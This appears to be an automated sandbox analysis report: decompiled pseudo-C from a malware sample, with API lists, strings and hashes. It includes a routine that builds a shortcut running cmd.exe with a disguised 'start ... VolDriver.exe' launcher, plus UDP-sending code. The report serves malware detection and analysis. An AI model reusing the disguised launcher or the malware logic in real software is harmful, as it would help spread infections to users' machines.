                                                                                                                                                                                                                                                                                    • Opcode ID: c2637b0e451e789f276395e354baee512bf947ab07dd5ce8b1a8847efd57730a
                                                                                                                                                                                                                                                                                    • Instruction ID: 33448fd8f16b6151abdcaf40b6ca2b1b809edec1cb8df60be6306fd5b5127b81
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2637b0e451e789f276395e354baee512bf947ab07dd5ce8b1a8847efd57730a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22213B70E00318AFCB50DF64DD45BDEBBB4AF09304F1080ABD24DB6281DB785A898F5A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                    			E0040DBD0(int __eax, long _a4, void* _a8, intOrPtr _a12, short _a16) {
                                                                                                                                                                                                                                                                                    				short _v6;
                                                                                                                                                                                                                                                                                    				short _v10;
                                                                                                                                                                                                                                                                                    				short _v14;
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				short _v20;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				int* _v24;
                                                                                                                                                                                                                                                                                    				char _v25;
                                                                                                                                                                                                                                                                                    				char _v29;
                                                                                                                                                                                                                                                                                    				int* _v52;
                                                                                                                                                                                                                                                                                    				char _v53;
                                                                                                                                                                                                                                                                                    				short _t30;
                                                                                                                                                                                                                                                                                    				short _t35;
                                                                                                                                                                                                                                                                                    				long _t38;
                                                                                                                                                                                                                                                                                    				int* _t45;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t50;
                                                                                                                                                                                                                                                                                    				void* _t60;
                                                                                                                                                                                                                                                                                    				int _t64;
                                                                                                                                                                                                                                                                                    				long _t67;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t50 = _a4;
                                                                                                                                                                                                                                                                                    				_t64 = __eax;
                                                                                                                                                                                                                                                                                    				_t30 = 0;
                                                                                                                                                                                                                                                                                    				_v25 = 0;
                                                                                                                                                                                                                                                                                    				if(_t50 == 0 ||  *_t50 != 0x756470 || _a8 == 0 || __eax == 0) {
                                                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                                                    					return _t30;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t60 = __eax + 4;
                                                                                                                                                                                                                                                                                    					_t45 = E00408B20(_t60);
                                                                                                                                                                                                                                                                                    					_t6 =  &(_t45[1]); // 0x4
                                                                                                                                                                                                                                                                                    					_v24 = _t45;
                                                                                                                                                                                                                                                                                    					 *_t45 = _t64;
                                                                                                                                                                                                                                                                                    					memcpy(_t6, _a8, _t64);
                                                                                                                                                                                                                                                                                    					_v18 = 0;
                                                                                                                                                                                                                                                                                    					_v14 = 0;
                                                                                                                                                                                                                                                                                    					_v10 = 0;
                                                                                                                                                                                                                                                                                    					_v6 = 0;
                                                                                                                                                                                                                                                                                    					_t35 = _a16;
                                                                                                                                                                                                                                                                                    					_v20 = 2;
                                                                                                                                                                                                                                                                                    					__imp__#9(_t35);
                                                                                                                                                                                                                                                                                    					_v22 = _t35;
                                                                                                                                                                                                                                                                                    					_v20 = _a12;
                                                                                                                                                                                                                                                                                    					if(_t60 == 0) {
                                                                                                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                                                                                                    						_v29 = 1;
                                                                                                                                                                                                                                                                                    						E00408C70(_t45);
                                                                                                                                                                                                                                                                                    						return _v29;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                                                    							_t38 = _a4;
                                                                                                                                                                                                                                                                                    							__imp__#20( *((intOrPtr*)(_t38 + 8)), _t45, _t60, 0,  &_v24, 0x10);
                                                                                                                                                                                                                                                                                    							_t67 = _t38;
                                                                                                                                                                                                                                                                                    							if(_t67 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							InterlockedExchangeAdd(_a4 + 0x1c, _t67);
                                                                                                                                                                                                                                                                                    							_t60 = _t60 - _t67;
                                                                                                                                                                                                                                                                                    							_t45 = _t45 + _t67;
                                                                                                                                                                                                                                                                                    							if(_t60 != 0) {
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v53 = 1;
                                                                                                                                                                                                                                                                                    								E00408C70(_v52);
                                                                                                                                                                                                                                                                                    								return _v53;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_t60 != 0) {
                                                                                                                                                                                                                                                                                    							E00408C70(_v52);
                                                                                                                                                                                                                                                                                    							_t30 = _v53;
                                                                                                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t45 = _v52;
                                                                                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L13:
                                                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                                                    0x0040dbd9
                                                                                                                                                                                                                                                                                    0x0040dbde
                                                                                                                                                                                                                                                                                    0x0040dbe0
                                                                                                                                                                                                                                                                                    0x0040dbe3
                                                                                                                                                                                                                                                                                    0x0040dbe9
                                                                                                                                                                                                                                                                                    0x0040dcea
                                                                                                                                                                                                                                                                                    0x0040dcf0
                                                                                                                                                                                                                                                                                    0x0040dc0d
                                                                                                                                                                                                                                                                                    0x0040dc0d
                                                                                                                                                                                                                                                                                    0x0040dc16
                                                                                                                                                                                                                                                                                    0x0040dc1d
                                                                                                                                                                                                                                                                                    0x0040dc21
                                                                                                                                                                                                                                                                                    0x0040dc25
                                                                                                                                                                                                                                                                                    0x0040dc27
                                                                                                                                                                                                                                                                                    0x0040dc2e
                                                                                                                                                                                                                                                                                    0x0040dc32
                                                                                                                                                                                                                                                                                    0x0040dc36
                                                                                                                                                                                                                                                                                    0x0040dc3a
                                                                                                                                                                                                                                                                                    0x0040dc3f
                                                                                                                                                                                                                                                                                    0x0040dc4b
                                                                                                                                                                                                                                                                                    0x0040dc50
                                                                                                                                                                                                                                                                                    0x0040dc59
                                                                                                                                                                                                                                                                                    0x0040dc5e
                                                                                                                                                                                                                                                                                    0x0040dc64
                                                                                                                                                                                                                                                                                    0x0040dcc0
                                                                                                                                                                                                                                                                                    0x0040dcc1
                                                                                                                                                                                                                                                                                    0x0040dcc6
                                                                                                                                                                                                                                                                                    0x0040dcd8
                                                                                                                                                                                                                                                                                    0x0040dc66
                                                                                                                                                                                                                                                                                    0x0040dc66
                                                                                                                                                                                                                                                                                    0x0040dc66
                                                                                                                                                                                                                                                                                    0x0040dc78
                                                                                                                                                                                                                                                                                    0x0040dc7e
                                                                                                                                                                                                                                                                                    0x0040dc83
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dc8d
                                                                                                                                                                                                                                                                                    0x0040dc93
                                                                                                                                                                                                                                                                                    0x0040dc95
                                                                                                                                                                                                                                                                                    0x0040dc99
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dc9b
                                                                                                                                                                                                                                                                                    0x0040dca0
                                                                                                                                                                                                                                                                                    0x0040dca5
                                                                                                                                                                                                                                                                                    0x0040dcb7
                                                                                                                                                                                                                                                                                    0x0040dcb7
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dc99
                                                                                                                                                                                                                                                                                    0x0040dcba
                                                                                                                                                                                                                                                                                    0x0040dcde
                                                                                                                                                                                                                                                                                    0x0040dce3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dcbc
                                                                                                                                                                                                                                                                                    0x0040dcbc
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dcbc
                                                                                                                                                                                                                                                                                    0x0040dcba
                                                                                                                                                                                                                                                                                    0x0040dc64
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 0040DC27
                                                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 0040DC50
                                                                                                                                                                                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 0040DC78
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DC8D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                                                                                                                    • String ID: pdu
                                                                                                                                                                                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                                                                                                                                                                                    • Opcode ID: 64e6edf90043f3ef5267befaaf6f5bc9513a580fe3cc4bc2b57856c41bc94de3
                                                                                                                                                                                                                                                                                    • Instruction ID: 1900bc5e36bec968277d7fd378407ddad580e15f752f42e7870c86cf4b77d333
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64e6edf90043f3ef5267befaaf6f5bc9513a580fe3cc4bc2b57856c41bc94de3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F31E1766083009FD710DFA9D880A9BB7E4AF89714F04456EF99897382D674CD08CBEB
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                                                                                                                                                    			E00404D70(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				short _v540;
                                                                                                                                                                                                                                                                                    				char* _t37;
                                                                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                    				_t37 =  &_v12;
                                                                                                                                                                                                                                                                                    				__imp__CoCreateInstance(0x410338, 0, 1, 0x410328, _t37);
                                                                                                                                                                                                                                                                                    				_v8 = _t37;
                                                                                                                                                                                                                                                                                    				if(_v8 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                                    					wsprintfW( &_v540, L"/c start .\\%s & start .\\%s\\VolDriver.exe", 0x415124, 0x415124);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x50))))(_v12, L"%windir%\\System32\\cmd.exe");
                                                                                                                                                                                                                                                                                    					_t42 =  *_v12;
                                                                                                                                                                                                                                                                                    					_t13 = _t42 + 0x44; // 0xffed0c85
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *_t13))(_v12, _a8, _a12);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x3c))))(_v12, 7);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x2c))))(_v12,  &_v540);
                                                                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12))))(_v12, 0x410348,  &_v16);
                                                                                                                                                                                                                                                                                    					if(_v8 >= 0 && _v16 != 0) {
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x18))))(_v16, _a4, 1);
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    0x00404d7b
                                                                                                                                                                                                                                                                                    0x00404d81
                                                                                                                                                                                                                                                                                    0x00404d93
                                                                                                                                                                                                                                                                                    0x00404d99
                                                                                                                                                                                                                                                                                    0x00404da0
                                                                                                                                                                                                                                                                                    0x00404dc6
                                                                                                                                                                                                                                                                                    0x00404de0
                                                                                                                                                                                                                                                                                    0x00404ded
                                                                                                                                                                                                                                                                                    0x00404df3
                                                                                                                                                                                                                                                                                    0x00404df6
                                                                                                                                                                                                                                                                                    0x00404e06
                                                                                                                                                                                                                                                                                    0x00404e1b
                                                                                                                                                                                                                                                                                    0x00404e33
                                                                                                                                                                                                                                                                                    0x00404e3a
                                                                                                                                                                                                                                                                                    0x00404e54
                                                                                                                                                                                                                                                                                    0x00404e62
                                                                                                                                                                                                                                                                                    0x00404e62
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404e70
                                                                                                                                                                                                                                                                                    0x00404e75

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00404D7B
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00410338,00000000,00000001,00410328,?), ref: 00404D93
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404DC6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • /c start .\%s & start .\%s\VolDriver.exe, xrefs: 00404DBA
                                                                                                                                                                                                                                                                                    • %windir%\System32\cmd.exe, xrefs: 00404DCF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateInitializeInstancewsprintf
                                                                                                                                                                                                                                                                                    • String ID: %windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                                                                                                                                                                                                                                    • API String ID: 2038452267-2473591295
                                                                                                                                                                                                                                                                                    • Opcode ID: eadea155d48dcf4b5dc2eddb40bd72b199a5ff6e8701186b8fb8f04e5b27ea74
                                                                                                                                                                                                                                                                                    • Instruction ID: 2a49fd5d28e8ccd51fed007e1346deb4ba552c81a06522ba7ecdc7d03be8f695
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eadea155d48dcf4b5dc2eddb40bd72b199a5ff6e8701186b8fb8f04e5b27ea74
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B31B775A40208EFCB04DF98D885EDEB7B5FF88704F208199E615A72A0C674AE81CB54
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00409660(void* __eax) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				if( *0x416e2c == 0) {
                                                                                                                                                                                                                                                                                    					return __eax;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t36 =  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    				_v12 = _t36 << 3;
                                                                                                                                                                                                                                                                                    				_t38 = E00408B20(_v12);
                                                                                                                                                                                                                                                                                    				_v8 = _t38;
                                                                                                                                                                                                                                                                                    				__eflags = _v8;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                                                    						__eflags = _v20 -  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_v8 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x416e30 + _v20 * 4)) + 4));
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_v8 + 4 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x416e30 + _v20 * 4)) + 8));
                                                                                                                                                                                                                                                                                    						_t65 = _v20 + 1;
                                                                                                                                                                                                                                                                                    						__eflags = _t65;
                                                                                                                                                                                                                                                                                    						_v20 = _t65;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v16 = CreateFileW(0x416be8, 0x40000000, 0, 0, 2, 2, 0);
                                                                                                                                                                                                                                                                                    					__eflags = _v16 - 0xffffffff;
                                                                                                                                                                                                                                                                                    					if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						WriteFile(_v16, _v8, _v12,  &_v24, 0);
                                                                                                                                                                                                                                                                                    						FlushFileBuffers(_v16);
                                                                                                                                                                                                                                                                                    						CloseHandle(_v16);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InterlockedExchange(0x4143b4, 0x3d);
                                                                                                                                                                                                                                                                                    					return E00408C70(_v8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t38;
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    0x0040966d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409674
                                                                                                                                                                                                                                                                                    0x0040967c
                                                                                                                                                                                                                                                                                    0x00409683
                                                                                                                                                                                                                                                                                    0x0040968b
                                                                                                                                                                                                                                                                                    0x0040968e
                                                                                                                                                                                                                                                                                    0x00409692
                                                                                                                                                                                                                                                                                    0x00409698
                                                                                                                                                                                                                                                                                    0x004096aa
                                                                                                                                                                                                                                                                                    0x004096ad
                                                                                                                                                                                                                                                                                    0x004096b3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004096c8
                                                                                                                                                                                                                                                                                    0x004096de
                                                                                                                                                                                                                                                                                    0x004096a4
                                                                                                                                                                                                                                                                                    0x004096a4
                                                                                                                                                                                                                                                                                    0x004096a7
                                                                                                                                                                                                                                                                                    0x004096a7
                                                                                                                                                                                                                                                                                    0x004096fe
                                                                                                                                                                                                                                                                                    0x00409701
                                                                                                                                                                                                                                                                                    0x00409705
                                                                                                                                                                                                                                                                                    0x00409719
                                                                                                                                                                                                                                                                                    0x00409723
                                                                                                                                                                                                                                                                                    0x0040972d
                                                                                                                                                                                                                                                                                    0x0040972d
                                                                                                                                                                                                                                                                                    0x0040973a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409749
                                                                                                                                                                                                                                                                                    0x0040974f

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00416BE8,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004096F8
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00409719
                                                                                                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32 ref: 00409723
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040972D
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(004143B4,0000003D), ref: 0040973A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 442028454-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ffe5f978a5d75daa98a19236d1bc63fd9fce486f64e544f4dc3e6b78cafa0eaa
                                                                                                                                                                                                                                                                                    • Instruction ID: 09bb8ad8a153661e876b0a8aa7cfca9b830c2f60f8f6b2a0515d583d03b87c58
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffe5f978a5d75daa98a19236d1bc63fd9fce486f64e544f4dc3e6b78cafa0eaa
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11314CB8A00208EFCB14DF94D845F9EB7B1BB48300F20C669E515A7391C775AE51CF59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                                                                    			E00407570(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				_v12 = _a4 | _a8 | _a12 | _a16 | _a20 | _a24;
                                                                                                                                                                                                                                                                                    				_v8 = __edx | __edx | __edx | __edx | __edx | __edx;
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                                                    0x0040757b
                                                                                                                                                                                                                                                                                    0x0040757e
                                                                                                                                                                                                                                                                                    0x0040758a
                                                                                                                                                                                                                                                                                    0x0040758d
                                                                                                                                                                                                                                                                                    0x00407599
                                                                                                                                                                                                                                                                                    0x0040759c
                                                                                                                                                                                                                                                                                    0x004075a8
                                                                                                                                                                                                                                                                                    0x004075ab
                                                                                                                                                                                                                                                                                    0x004075b7
                                                                                                                                                                                                                                                                                    0x004075ba
                                                                                                                                                                                                                                                                                    0x004075c6
                                                                                                                                                                                                                                                                                    0x004075cb
                                                                                                                                                                                                                                                                                    0x004075ce
                                                                                                                                                                                                                                                                                    0x004075dc

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _allshl
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 435966717-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d51c0cfb7cecbe22f3a005448584aa28a11641046ad401d5bf26070a09b22ed4
                                                                                                                                                                                                                                                                                    • Instruction ID: a1b14869e86cb328d4ae7b27d3c95eded15a07d37ad0fd28e3103b9823fe5a09
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d51c0cfb7cecbe22f3a005448584aa28a11641046ad401d5bf26070a09b22ed4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4F03172901429AB9710EEEF84824CAFBE69F88364B118576FC18E3270E9709D1146F2
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040DD00(intOrPtr* __ebx, void* __edi) {
                                                                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t18;
                                                                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t18 = __ebx;
                                                                                                                                                                                                                                                                                    				if(__ebx != 0 &&  *__ebx == 0x756470) {
                                                                                                                                                                                                                                                                                    					SetEvent( *(__ebx + 0x10));
                                                                                                                                                                                                                                                                                    					WaitForSingleObject( *(__ebx + 0x14), 0xffffffff);
                                                                                                                                                                                                                                                                                    					CloseHandle( *(__ebx + 0x14));
                                                                                                                                                                                                                                                                                    					_t26 =  *((intOrPtr*)(__ebx + 0x20));
                                                                                                                                                                                                                                                                                    					if(_t26 == 0) {
                                                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                                                    						E00409600( *((intOrPtr*)(_t18 + 8)));
                                                                                                                                                                                                                                                                                    						return E00408C70(_t18);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						E00408C70( *((intOrPtr*)(_t26 + 0x18)));
                                                                                                                                                                                                                                                                                    						_t23 =  *((intOrPtr*)(_t26 + 0x1c));
                                                                                                                                                                                                                                                                                    						E00408C70(_t26);
                                                                                                                                                                                                                                                                                    						_t28 = _t28 + 8;
                                                                                                                                                                                                                                                                                    						_t26 = _t23;
                                                                                                                                                                                                                                                                                    					} while (_t23 != 0);
                                                                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x0040dd00
                                                                                                                                                                                                                                                                                    0x0040dd02
                                                                                                                                                                                                                                                                                    0x0040dd11
                                                                                                                                                                                                                                                                                    0x0040dd1d
                                                                                                                                                                                                                                                                                    0x0040dd27
                                                                                                                                                                                                                                                                                    0x0040dd2d
                                                                                                                                                                                                                                                                                    0x0040dd32
                                                                                                                                                                                                                                                                                    0x0040dd51
                                                                                                                                                                                                                                                                                    0x0040dd55
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dd63
                                                                                                                                                                                                                                                                                    0x0040dd35
